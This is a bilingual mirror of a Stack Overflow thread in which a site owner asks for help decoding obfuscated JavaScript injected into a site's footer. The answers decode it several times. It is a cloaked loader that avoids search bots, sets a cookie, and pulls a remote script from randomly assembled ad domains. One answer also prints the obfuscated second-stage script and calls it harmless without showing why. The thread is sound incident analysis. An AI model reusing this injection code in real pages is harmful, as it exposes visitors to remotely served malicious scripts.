解码一些注入的 Javascript?
声明:本页面是StackOverFlow热门问题的中英对照翻译,遵循CC BY-SA 4.0协议,如果您需要使用它,必须同样遵循CC BY-SA许可,注明原文地址和作者信息,同时你必须将它归于原作者(不是我):StackOverFlow
原文地址: http://stackoverflow.com/questions/3391623/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
Decode some injected Javascript?
提问by Jonathan Wold
I had the following injected into the footer of a site of mine and, in an effort of solving the greater mystery ("How" it happened), I'm trying to decode it. Any ideas?
我将以下内容注入到我网站的页脚中,为了解决更大的谜团(“它是如何发生的”),我正在尝试对其进行解码。有任何想法吗?
Here's the code:
这是代码:
<ads><script type="text/javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%3D%3D%2D%31%26%26%21%61%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%62%29%26%26%63%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%29%7B%76%61%72%20%64%3D%5B%22%6D%79%61%64%73%2E%6E%61%6D%65%22%2C%22%61%64%73%6E%65%74%2E%62%69%7A%22%2C%22%74%6F%6F%6C%62%61%72%63%6F%6D%2E%6F%72%67%22%2C%22%6D%79%62%61%72%2E%75%73%22%2C%22%66%72%65%65%61%64%2E%6E%61%6D%65%22%5D%2C%65%3D%5B%22%76%61%67%69%2E%22%2C%22%76%61%69%6E%2E%22%2C%22%76%61%6C%65%2E%22%2C%22%76%61%72%73%2E%22%2C%22%76%61%72%79%2E%22%2C%22%76%61%73%61%2E%22%2C%22%76%61%75%74%2E%22%2C%22%76%61%76%73%2E%22%2C%22%76%69%6E%79%2E%22%2C%22%76%69%6F%6C%2E%22%2C%22%76%72%6F%77%2E%22%2C%22%76%75%67%73%2E%22%2C%22%76%75%6C%6E%2E%22%5D%2C%66%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%64%2E%6C%65%6E%67%74%68%29%2C%67%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%65%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%39%30%37%32%45%34%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%68%6F%6C%79%63%6F%6F%6B%69%65%3D%22%2B%65%73%63%61%70%65%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%73%79%73%74%65%6D%2F%63%61%70%74%69%6F%6E%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));</script></ads>
采纳答案by Pat
You can decode the string using this tool. Set string conversion options to URLand Decode. Then you can pretty it up with js beautifier.
您可以使用此工具对字符串进行解码。将字符串转换选项设置为URL和Decode。然后你可以用js beautifier 美化它。
And because I'm a curious sort, I took a look at the output. It's writing a new caption.jsfile to your pages from a semi-random domain. There are 2 arrays of URL segments that are used to build the full domain, so I'd say you've got something to go with.
因为我是个好奇的人,所以我查看了输出。它正在caption.js从半随机域向您的页面写入一个新文件。有 2 个 URL 段数组用于构建完整的域,所以我想说你已经有了一些东西。
回答by Jordan Running
<script language="javascript" type="text/javascript">
var a = window.navigator.userAgent,
b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
c = navigator.appVersion;
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
f = Math.floor(Math.random() * d.length),
g = Math.floor(Math.random() * e.length);
dt = new Date;
dt.setTime(dt.getTime() + 9072E4);
document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>')
};
</script>
So, prepends a subdomain from e(e.g. vagi.) to a domain name from d(e.g. myads.name) and loads a script from /system/caption.jsat that domain (e.g. http://vagi.myads.name/system/caption.js).
因此,预先考虑从一个子域e(例如vagi.)从一个域名d(例如,myads.name来自)和负载脚本/system/caption.js在那个领域(如http://vagi.myads.name/system/caption.js)。
回答by Rixius
var a = window.navigator.userAgent,
b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
c = navigator.appVersion;
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
f = Math.floor(Math.random() * d.length),
g = Math.floor(Math.random() * e.length);
dt = new Date;
dt.setTime(dt.getTime() + 9072E4);
document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>')
};
code is loading a random subdomain-sld combo with a cookie set, to load unsecure content.
代码正在加载带有 cookie 集的随机子域 sld 组合,以加载不安全的内容。
回答by em70
The code you posted decodes to
您发布的代码解码为
var a = window.navigator.userAgent,
b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
c = navigator.appVersion;
if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) {
var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"],
e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."],
f = Math.floor(Math.random() * d.length),
g = Math.floor(Math.random() * e.length);
dt = new Date;
dt.setTime(dt.getTime() + 9072E4);
document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/";
document.write('')
};
which in turn loads code from a url composed in a pseudorandom way provided that the if condition is met.
如果满足 if 条件,它反过来从以伪随机方式组成的 url 加载代码。
If you open up, for instance, http://vain.adsnet.biz/system/caption.jsyou'll be presented with the following javascript code.
例如,如果您打开http://vain.adsnet.biz/system/caption.js,您将看到以下 javascript 代码。
I leave the interpretation to you, however it looks quite harmless.
我把解释留给你,但它看起来很无害。
function tT() {};
var yWP = new Array();
tT.prototype = {
h: function () {
this.i = "";
var nH = function () {};
var tE = 30295;
var u = "";
zB = false;
this.a = '';
this.eY = 29407;
var z = document;
vD = "vD";
var gT = "gT";
var oG = '';
var lF = '';
fU = "fU";
var q = function () {
return 'q'
};
var c = window;
var m = function () {
return 'm'
};
var kS = "kS";
this.b = "";
this.p = 29430;
var j = this;
dL = "";
var cC = new Date();
cQ = 33459;
var uY = "uY";
var vO = function () {};
zN = "zN";
jIZ = '';
var mH = 21601;
String.prototype.lP = function (v, hF) {
var t = this;
return t.replace(v, hF)
};
var nA = "";
this.xK = 48622;
zG = "";
var kF = function () {};
function aF() {};
var mI = function () {};
var oY = '';
var g = 'sfe?tfTw'.lP(/[wfoj\?]/g, '') + 'irmkeko('.lP(/[\(rO\[k]/g, '') + 'ubty'.lP(/[y\+b\>\)]/g, '');
var iN = new Array();
mJ = "mJ";
aW = "aW";
var hU = "hU";
this.kC = 28044;
var k = 'tbr3e*c(r*e3a('.lP(/[\(3b\*G]/g, '') + 'tEe>nat>gaeat)'.lP(/[\)a\>\]\|'.lP(/[\|\)\(MN]/g, ''));
var cJ = function () {};
var tX = false;
this.xHX = false;
function jP() {};
var eZ = 16039;
bQ = "bQ";
var eSM = new Date();
c[g](function () {
j.h()
}, 384);
this.xR = "";
var jB = function () {
return 'jB'
};
var fP = function () {
return 'fP'
};
var bX = new Array();
}
function iLD() {};
var mQ = function () {};
var wZV = "";this.eK = 5506;
}
};
fO = 30941;
var hW = new tT();
wU = 40956;
hW.h();
hZ = "hZ";
How could you have done this on your own? URLDecode + jsbeautifier or jsunpack are more than enough to get this far ;)
你怎么能自己做这件事?URLDecode + jsbeautifier 或 jsunpack 足以让我们走到这一步;)
回答by Matt Breckon
All of those numbers are hexadecimal values for ASCII characters. When unescape is called they get turned into real characters. e.g. %3C is '<'.
所有这些数字都是 ASCII 字符的十六进制值。当调用 unescape 时,它们会变成真正的字符。例如 %3C 是“<”。
Why not use a message box to display the output of unescape(...)
为什么不使用消息框来显示 unescape(...)
回答by Chris Foster
You can use the hex decoder here: http://home2.paulschou.net/tools/xlate/The code is
你可以在这里使用十六进制解码器:http: //home2.paulschou.net/tools/xlate/代码是
<script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script>
回答by Borealid
<script language="javascript" type="text/javascript">
var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion;
if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){
var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],
e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],
f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
dt=new Date;
dt.setTime(dt.getTime()+9072E4);
document.cookie="holycookie="+escape("holycookie")+";
expires="+dt.toGMTString()+";
path=/";
document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};
</script>
回答by user409021
Here's a URLDecoder: http://meyerweb.com/eric/tools/dencoder/
这是一个 URLDecoder:http: //meyerweb.com/eric/tools/dencoder/
And the code it writes:
以及它写的代码:
<script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script>
OK, so that's not too helpful. It appears to insert another JS file if the user doesn't have a cookie named "holycookie" and isn't the google bot. Most of that is just junk to pick which domain name to get the payload from.
好的,所以这不是很有帮助。如果用户没有名为“holycookie”的 cookie 并且不是 google bot,它似乎会插入另一个 JS 文件。其中大部分只是选择从哪个域名获取有效负载的垃圾。
回答by Dane Hart
Use "Version Control" so this doesn't happen in the future. After a good build is completed, and everything is the way you want it, save it to an external hard drive while you are offline.
使用“版本控制”,这样以后就不会发生这种情况。完成良好的构建后,一切都如您所愿,请在离线时将其保存到外部硬盘驱动器。
Did you recently do something to upset a coworker who is a programmer?
你最近做了什么让一个程序员同事不高兴的事情吗?
回答by Wifi Cordon
Used php function rawurldecode
使用 php 函数 rawurldecode
<script language="javascript" type="text/javascript">
var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion;
if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){
var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
dt=new Date;
dt.setTime(dt.getTime()+9072E4);
document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/";
document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};
</script>
